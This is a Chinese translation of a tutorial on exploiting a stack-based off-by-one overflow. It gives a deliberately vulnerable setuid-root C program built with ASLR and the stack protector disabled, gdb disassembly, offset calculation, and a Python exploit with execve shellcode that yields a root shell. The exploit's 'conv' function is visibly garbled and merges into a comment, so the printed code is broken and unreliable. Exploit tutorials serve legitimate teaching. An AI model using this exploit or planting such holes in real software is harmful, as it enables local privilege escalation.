Off-By-One 漏洞（基于栈） - 《ApacheCN 网络安全译文集》

译者：hackyzh

原文：Off-By-One Vulnerability (Stack Based)

虚拟机安装：Ubuntu 12.04（x86）

什么是off by one？

将源字符串复制到目标缓冲区可能会导致off by one

1、源字符串长度等于目标缓冲区长度。

当源字符串长度等于目标缓冲区长度时，单个NULL字节将被复制到目标缓冲区上方。这里由于目标缓冲区位于堆栈中，所以单个NULL字节可以覆盖存储在堆栈中的调用者的EBP的最低有效位（LSB），这可能导致任意的代码执行。

一如既往的充分的定义，让我们来看看off by one的漏洞代码！

漏洞代码：

//vuln.c
#include <stdio.h>
#include <string.h>
void foo(char* arg);
void bar(char* arg);
void foo(char* arg) {
 bar(arg); /* [1] */
}
void bar(char* arg) {
 char buf[256];
 strcpy(buf, arg); /* [2] */
}
int main(int argc, char *argv[]) {
 if(strlen(argv[1])>256) { /* [3] */
  printf("Attempted Buffer Overflow\n");
  fflush(stdout);
  return -1;
 }
 foo(argv[1]); /* [4] */
 return 0;
}

编译命令

#echo 0 > /proc/sys/kernel/randomize_va_space
$gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

上述漏洞代码的第[2]行是可能发生off by one溢出的地方。目标缓冲区长度为256，因此长度为256字节的源字符串可能导致任意代码执行。

如何执行任意代码执行？

使用称为“EBP覆盖”的技术实现任意代码执行。如果调用者的EBP位于目标缓冲区之上，则在strcpy之后，单个NULL字节将覆盖调用者EBP的LSB。要了解更多关于off by one,让我们反汇编漏洞代码并绘制它的堆栈布局。

反汇编：

 (gdb) disassemble main
Dump of assembler code for function main:
 //Function Prologue
 0x08048497 <+0>: push %ebp                    //backup caller's ebp
 0x08048498 <+1>: mov %esp,%ebp                //set callee's (main) ebp to esp
 0x0804849a <+3>: push %edi                    //backup EDI
 0x0804849b <+4>: sub $0x8,%esp                //create stack space
 0x0804849e <+7>: mov 0xc(%ebp),%eax           //eax = argv
 0x080484a1 <+10>: add $0x4,%eax               //eax = &argv[1]
 0x080484a4 <+13>: mov (%eax),%eax             //eax = argv[1]
 0x080484a6 <+15>: movl $0xffffffff,-0x8(%ebp) //String Length Calculation -- Begins here
 0x080484ad <+22>: mov %eax,%edx
 0x080484af <+24>: mov $0x0,%eax
 0x080484b4 <+29>: mov -0x8(%ebp),%ecx
 0x080484b7 <+32>: mov %edx,%edi
 0x080484b9 <+34>: repnz scas %es:(%edi),%al
 0x080484bb <+36>: mov %ecx,%eax
 0x080484bd <+38>: not %eax
 0x080484bf <+40>: sub $0x1,%eax               //String Length Calculation -- Ends here
 0x080484c2 <+43>: cmp $0x100,%eax             //eax = strlen(argv[1]). if eax > 256
 0x080484c7 <+48>: jbe 0x80484e9 <main+82>     //Jmp if NOT greater
 0x080484c9 <+50>: movl $0x80485e0,(%esp)      //If greater print error string,flush and return.
 0x080484d0 <+57>: call 0x8048380 <puts@plt>   
 0x080484d5 <+62>: mov 0x804a020,%eax          
 0x080484da <+67>: mov %eax,(%esp)             
 0x080484dd <+70>: call 0x8048360 <fflush@plt>
 0x080484e2 <+75>: mov $0x1,%eax              
 0x080484e7 <+80>: jmp 0x80484fe <main+103>
 0x080484e9 <+82>: mov 0xc(%ebp),%eax          //argv[1] <= 256, eax = argv
 0x080484ec <+85>: add $0x4,%eax               //eax = &argv[1]
 0x080484ef <+88>: mov (%eax),%eax             //eax = argv[1]
 0x080484f1 <+90>: mov %eax,(%esp)             //foo arg
 0x080484f4 <+93>: call 0x8048464              //call foo
 0x080484f9 <+98>: mov $0x0,%eax               //return value

 //Function Epilogue
 0x080484fe <+103>: add $0x8,%esp              //unwind stack space
 0x08048501 <+106>: pop %edi                   //restore EDI
 0x08048502 <+107>: pop %ebp                   //restore EBP
 0x08048503 <+108>: ret                        //return
End of assembler dump.
(gdb) disassemble foo
Dump of assembler code for function foo:
 //Function prologue
 0x08048464 <+0>: push %ebp                    //backup caller's (main) ebp
 0x08048465 <+1>: mov %esp,%ebp                //set callee's (foo) ebp to esp
 0x08048467 <+3>: sub $0x4,%esp                //create stack space
 0x0804846a <+6>: mov 0x8(%ebp),%eax           //foo arg
 0x0804846d <+9>: mov %eax,(%esp)              //bar arg = foo arg
 0x08048470 <+12>: call 0x8048477              //call bar

 //Function Epilogue 
 0x08048475 <+17>: leave                       //unwind stack space + restore ebp
 0x08048476 <+18>: ret                         //return
End of assembler dump.
(gdb) disassemble bar
Dump of assembler code for function bar:
 //Function Prologue
 0x08048477 <+0>: push %ebp                    //backup caller's (foo) ebp
 0x08048478 <+1>: mov %esp,%ebp                //set callee's (bar) ebp to esp
 0x0804847a <+3>: sub $0x108,%esp              //create stack space
 0x08048480 <+9>: mov 0x8(%ebp),%eax           //bar arg
 0x08048483 <+12>: mov %eax,0x4(%esp)          //strcpy arg2
 0x08048487 <+16>: lea -0x100(%ebp),%eax       //buf
 0x0804848d <+22>: mov %eax,(%esp)             //strcpy arg1
 0x08048490 <+25>: call 0x8048370 <strcpy@plt> //call strcpy

 //Function Epilogue
 0x08048495 <+30>: leave                       //unwind stack space + restore ebp
 0x08048496 <+31>: ret                         //return
End of assembler dump.
(gdb)

堆栈布局

Off-By-One 漏洞（基于栈） - 图1

当我们已经知道256字节的用户输入，用空字节可以覆盖foo的EBP的LSB。所以当foo的存储在目标缓冲区buf之上的EBP被一个NULL字节所覆盖时，ebp从0xbffff2d8变为0xbffff200。从堆栈布局我们可以看到堆栈位置0xbffff200是目标缓冲区buf的一部分，由于用户输入被复制到该目标缓冲区，攻击者可以控制这个堆栈位置（0xbffff200），因此他控制指令指针（eip ）使用他可以实现任意代码执行。让我们通过发送一系列256的“A”来测试它。

测试步骤1：EBP是否覆盖，从而可能覆盖返回地址？

(gdb) r `python -c 'print "A"*256'`
Starting program: /home/sploitfun/lsploits/new/obo/stack/vuln `python -c 'print "A"*256'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) p/x $eip
$1 = 0x41414141
(gdb)

以上输出显示由于EBP覆盖，我们已经控制指令指针（EIP）。

测试步骤2：距离目标缓冲区的偏移是多少？

现在，我们可以从目标缓冲区buf的起始位置开始找到偏移量，我们需要替换我们的返回地址。记住在off by one 漏洞中，我们不会覆盖堆栈中存储的实际返回地址（像我们在基于堆栈的缓冲区溢出中），而是攻击者控制的目标缓冲区buf内的4字节内存区域将被视为返回地址位置（在off by one溢出之后）。因此，我们需要找到这个返回地址位置偏移量（从buf），它是目标缓冲区buf本身的一部分。不是很清楚，但是没有问题继续阅读！

现在让我们尝试从文本段地址0x08048490开始了解CPU的执行情况。

0x08048490 - 调用strcpy - 此指令执行导致逐个溢出，因此foo的EBP值（存储在堆栈位置0xbffff2cc）从0xbffff2d8更改为0xbffff200。
0x08048495 - leave - leave指令解开此函数的堆栈空间并恢复ebp。

leave: mov ebp, esp;        //unwind stack space by setting esp to ebp. 
       pop ebp;             //restore ebp
*** As per our example: ***
leave: mov ebp, esp;        //esp = ebp = 0xbffff2cc
       pop ebp;             //ebp = 0xbffff200 (Overwritten EBP value is now stored in ebp register); esp = 0xbffff2d0

0x08048495 - ret - 返回到foo的指令0x08048475
0x08048475 - leave - leave指令解除此函数的堆栈空间并恢复ebp。

*** As per our example: ***
leave: mov ebp, esp;        //esp = ebp = 0xbffff200 (As part of unwinding esp is shifted down instead of up!!)
       pop ebp;             //ebp = 0x41414141; esp = 0xbffff204

0x08048476 - ret - 返回到位于ESP（0xbffff204）的指令。现在，ESP指向攻击者控制的缓冲区，因此攻击者可以返回到任何要实现任意代码执行的位置。

现在让我们回到我们原始的测试，找到从目标缓冲区buf到返回地址的偏移量。如我们的堆栈布局图所示，buf位于0xbffff158，在CPU执行后，我们知道目标缓冲区buf中的返回地址位于0xbffff204。因此，从buf到返回地址的偏移量为0xbffff204 - 0xbffff158 = 0xac。因此，用户输入的形式"A"* 172 +"B"* 4 +"A"* 80，用BBBB覆盖EIP。

$ cat exp_tst.py 
#exp_tst.py
#!/usr/bin/env python
import struct
from subprocess import call

buf = "A" * 172
buf += "B" * 4
buf += "A" * 80

print "Calling vulnerable program"
call(["./vuln", buf])

$ python exp_tst.py 
Calling vulnerable program
$ sudo gdb -q vuln 
Reading symbols from /home/sploitfun/lsploits/new/obo/stack/vuln...(no debugging symbols found)...done.
(gdb) core-file core
[New LWP 4055]
warning: Can't read pathname for load map: Input/output error.
Core was generated by `./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0 0x42424242 in ?? ()
(gdb) p/x $eip
$1 = 0x42424242
(gdb)

以上输出显示攻击者可以控制返回地址。返回地址位于buf的偏移量(0xac)处。有了这些信息，我们可以编写一个漏洞利用程序来实现任意的代码执行。

利用代码:

#exp.py
#!/usr/bin/env python
import struct
from subprocess import call

#Spawn a shell. 
#execve(/bin/sh) Size- 28 bytes.
scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x90\x90\x90"

ret_addr = 0xbffff218

#endianess conversion
def conv(num):
 return struct.pack("<I",numturn Address + NOP's + Shellcode + Junk
buf = "A" * 172
buf += conv(ret_addr)
buf += "\x90" * 30
buf += scode
buf += "A" * 22

print "Calling vulnerable program"
call(["./vuln", buf])

执行上面的exploit程序给我们root shell，如下所示：

$ python exp.py 
Calling vulnerable program
# id
uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)
# exit
$

off by one看起来像一个愚蠢的bug，它令人奇怪的地方是开发人员造成这么小的错误可能会导致任意代码执行。off by one总是导致任意代码执行吗？

如果调用者的EBP不存在于目的地缓冲区之上怎么办？

这个问题的答案很简单，我们不能用EBP覆写技术来利用它!（但是一些其他的利用技术可能是可能的，因为代码中存在一个bug）

在什么情况下，调用者的EBP不会出现在目标缓冲区上方？

情况1：目标缓冲区之上可能存在其他局部变量。

...
void bar(char* arg) {
 int x = 10; /* [1] */
 char buf[256]; /* [2] */ 
 strcpy(buf, arg); /* [3] */ 
}
...

因此，在这些情况下，在缓冲区buf和EBP的结尾之间找到了一个局部变量，它不允许我们覆盖EBP的LSB！

情况2：对齐空间 - 默认情况下，gcc将堆栈空间对齐为16字节边界，即在创建堆栈空间之前）ESP的最后4位是0并且使用and指令，如下面的函数反汇编所示。

Dump of assembler code for function main:
 0x08048497 <+0>: push %ebp
 0x08048498 <+1>: mov %esp,%ebp
 0x0804849a <+3>: push %edi
 0x0804849b <+4>: and $0xfffffff0,%esp               //Stack space aligned to 16 byte boundary
 0x0804849e <+7>: sub $0x20,%esp                     //create stack space
...

因此，在这些情况下，在缓冲区buf和EBP的结尾之间找到一个对齐空间（最多12个字节），这不允许我们覆盖EBP的LSB！

因为这个原因，我们在编译我们漏洞代码（vuln.c）时添加了gcc参数-mpreferred-stack-boundary = 2!

请求帮助!!:如果在创建堆栈空间之前，ESP已经在16字节边界层上对齐了？在这种情况下，即使程序使用gcc的16字节的默认堆栈边界进行编译，EBP覆写也是可行的。但到目前为止，我没有创建这样一个工作代码。在我创建堆栈空间之前的所有尝试中，ESP在16字节边界上不对齐，无论如何谨慎地创建我的堆栈内容，gcc为本地变量添加了一些额外的空间，这使得ESP对齐不到16字节边界。如果任何人有工作代码或有一个答案:为什么ESP总是不对齐，请让我知道。

参考

http://seclists.org/bugtraq/1998/Oct/109